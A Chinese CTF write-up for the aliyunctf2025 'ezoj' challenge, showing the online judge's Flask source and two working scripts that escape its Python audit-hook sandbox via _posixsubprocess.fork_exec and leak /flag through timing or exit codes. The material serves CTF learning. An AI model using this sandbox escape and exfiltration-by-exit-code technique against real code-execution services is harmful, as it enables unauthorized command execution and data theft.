aliyunctf2025 ezoj 非预期解与官方题解复现

ezoj

这比赛的pwn全是kernel,我会不了一点,于是就去协助web手打web了。这题我们当时用的是时间盲注,后来发现官方题解更简单,所以复现并记录一下。

初步分析

网页最下面提示了源代码在/source下,访问即可得到网页源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
import os
import subprocess
import uuid
import json
from flask import Flask, request, jsonify, send_file
from pathlib import Path

app = Flask(__name__)

SUBMISSIONS_PATH = Path("./submissions")
PROBLEMS_PATH = Path("./problems")

SUBMISSIONS_PATH.mkdir(parents=True, exist_ok=True)

CODE_TEMPLATE = """
import sys
import math
import collections
import queue
import heapq
import bisect

def audit_checker(event,args):
if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
raise RuntimeError

sys.addaudithook(audit_checker)


"""


class OJTimeLimitExceed(Exception):
pass


class OJRuntimeError(Exception):
pass


@app.route("/")
def index():
return send_file("static/index.html")


@app.route("/source")
def source():
return send_file("server.py")


@app.route("/api/problems")
def list_problems():
problems_dir = PROBLEMS_PATH
problems = []
for problem in problems_dir.iterdir():
problem_config_file = problem / "problem.json"
if not problem_config_file.exists():
continue

problem_config = json.load(problem_config_file.open("r"))
problem = {
"problem_id": problem.name,
"name": problem_config["name"],
"description": problem_config["description"],
}
problems.append(problem)

problems = sorted(problems, key=lambda x: x["problem_id"])

problems = {"problems": problems}
return jsonify(problems), 200


@app.route("/api/submit", methods=["POST"])
def submit_code():
try:
data = request.get_json()
code = data.get("code")
problem_id = data.get("problem_id")

if code is None or problem_id is None:
return (
jsonify({"status": "ER", "message": "Missing 'code' or 'problem_id'"}),
400,
)

problem_id = str(int(problem_id))
problem_dir = PROBLEMS_PATH / problem_id
if not problem_dir.exists():
return (
jsonify(
{"status": "ER", "message": f"Problem ID {problem_id} not found!"}
),
404,
)

code_filename = SUBMISSIONS_PATH / f"submission_{uuid.uuid4()}.py"
with open(code_filename, "w") as code_file:
code = CODE_TEMPLATE + code
code_file.write(code)

result = judge(code_filename, problem_dir)

code_filename.unlink()

return jsonify(result)

except Exception as e:
return jsonify({"status": "ER", "message": str(e)}), 500


def judge(code_filename, problem_dir):
test_files = sorted(problem_dir.glob("*.input"))
total_tests = len(test_files)
passed_tests = 0

try:
for test_file in test_files:
input_file = test_file
expected_output_file = problem_dir / f"{test_file.stem}.output"

if not expected_output_file.exists():
continue

case_passed = run_code(code_filename, input_file, expected_output_file)

if case_passed:
passed_tests += 1

if passed_tests == total_tests:
return {"status": "AC", "message": f"Accepted"}
else:
return {
"status": "WA",
"message": f"Wrang Answer: pass({passed_tests}/{total_tests})",
}
except OJRuntimeError as e:
return {"status": "RE", "message": f"Runtime Error: ret={e.args[0]}"}
except OJTimeLimitExceed:
return {"status": "TLE", "message": "Time Limit Exceed"}


def run_code(code_filename, input_file, expected_output_file):
with open(input_file, "r") as infile, open(
expected_output_file, "r"
) as expected_output:
expected_output_content = expected_output.read().strip()

process = subprocess.Popen(
["python3", code_filename],
stdin=infile,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
)

try:
stdout, stderr = process.communicate(timeout=5)
except subprocess.TimeoutExpired:
process.kill()
raise OJTimeLimitExceed

if process.returncode != 0:
raise OJRuntimeError(process.returncode)

if stdout.strip() == expected_output_content:
return True
else:
return False


if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000)

通过分析源码和抓包可以看出:

  1. 程序通过/api/submit接收一个POST请求,执行请求中的代码
  2. 代码被拼接到CODE_TEMPLATE后执行,并且有白名单沙箱限制调用

这里考虑沙箱逃逸。Python中有比题给的沙箱更底层的调用_posixsubprocess,它不会被监控,可以尝试用它执行命令。

非预期解(时间盲注)

网上很容易查到_posixsubprocess执行任意命令的板子:

1
2
3
4
import os
import _posixsubprocess
cmd = b''
_posixsubprocess.fork_exec([b"/bin/sh", b"-c" , cmd], [b"/bin/sh"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)

现在的问题是,程序没有回显,且不出网无法反弹shell。我们要想办法搞出命令的回显才行。我们在比赛时的第一反应是时间盲注
时间盲注的大概原理是,用一个合适大小的字符集匹配某个字节流中的字符,若匹配不成功则pass,匹配成功则让程序停止(sleep)一段时间再相应,那么通过相应时间就可以推断字节流的内容,拿到flag。这实际上就是将时间解释为输出的方法。
知道原理之后就好写脚本了。这个脚本应该还能优化成二分查找,但我们比较懒,没优化()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import requests
import time
url = "http://121.41.238.106:29330/api/submit"
data = {
"problem_id":"0",
"code":"import os\nimport _posixsubprocess\n\n_posixsubprocess.fork_exec([b\"/bin/sh\", b\"-c\" , b\"\"\"chr=$(cat /flag* | cut -c{j})\nif [ \"$chr\" = \"{index}\" ]; then\t\nsleep 0.3\nfi\"\"\"], [b\"/bin/sh\"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), 2, False,False, None, None, None, -1, None, False)"
}

result = ""
charset = "abcdef-{}liyunt0123456789"
print(charset)
for j in range(1,60):
getit = False
for i in range(0, len(charset)):
data1 = data.copy()
data1["code"] = data["code"].format(j=j,index=charset[i])
start_time = time.monotonic()
res = requests.post(url=url,json=data1)

# print(f"now>>>{j}::{charset[i]}", f"time={time.monotonic() - start_time}")

if time.monotonic() - start_time > 3:
if getit:
print(f"{j}::{charset[i]}")
continue
result += charset[i]
print(result)
getit = True

if not getit:
print(f">> {j} is failed")

预期解复现

参考官方题解:https://xz.aliyun.com/news/17029
官方题解用另一种方法解决了回显问题。当提交的代码运行失败或异常退出时,网页会回显退出码。而退出码恰好是0~255,即一个字节。

那么现在的问题就是,_posixsubprocess执行命令时显然是exec了一个子进程执行,执行命令的输出是子进程的stdout,我们怎么在父进程获取这个输出呢?
这就需要看一下_posixsubprocess的细节用法了。网上几乎查不到相关接口,我们只能去看源码了。源码:https://github.com/python/cpython.git
在源码的/Modules文件夹下的_posixsubprocess.c我们可以看到这个函数的源码。它进行了多层预处理,最终调用child_exec函数执行exec。注意722行的这些代码:

1
2
3
4
5
6
if (c2pwrite == 1) {
if (_Py_set_inheritable_async_safe(c2pwrite, 1, NULL) < 0)
goto error;
}
else if (c2pwrite != -1)
POSIX_CALL(dup2(c2pwrite, 1)); /* stdout */

这会把子进程的stdout转发到c2pwrite上。这样,我们就可以通过c2pwrite参数获取子进程的输出并通过退出码逐步输出。
脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
import requests

URL = "http://121.41.238.106:42312//api/submit"
CODE_TEMPLATE = """
import _posixsubprocess
import os
import time
import sys

std_pipe = os.pipe()
err_pipe = os.pipe()

_posixsubprocess.fork_exec(
(b"/bin/bash",b"-c",b"{command}"),
[b"/bin/bash"],
True,
(),
None,
None,
-1,
-1,
-1,
std_pipe[1], #c2pwrite
-1,
-1,
*(err_pipe),
False,
False,
False,
None,
None,
None,
-1,
None,
False,
)
time.sleep(0.1)
content = os.read(std_pipe[0],1024)
content_len = len(content)

if {loc} < content_len:
sys.exit(content[{loc}])
else:
sys.exit(255)
"""

command="cat /flag*"
received = ""

for i in range(254):
code = CODE_TEMPLATE.format(loc=i,command=command)
data = {"problem_id":0,"code":code}
resp = requests.post(URL,json=data)
resp_data = resp.json()
assert(resp_data["status"] == "RE")
ret_loc = resp_data["message"].find("ret=")
ret_code = resp_data["message"][ret_loc+4:]
if ret_code == "255":
break
received += chr(int(ret_code))
print(received)


aliyunctf2025 ezoj 非预期解与官方题解复现
https://powchan.github.io.git/2025/02/26/aliyunctf2025-ezoj-非预期解与官方题解复现/
作者
powchan
发布于
2025年2月26日
许可协议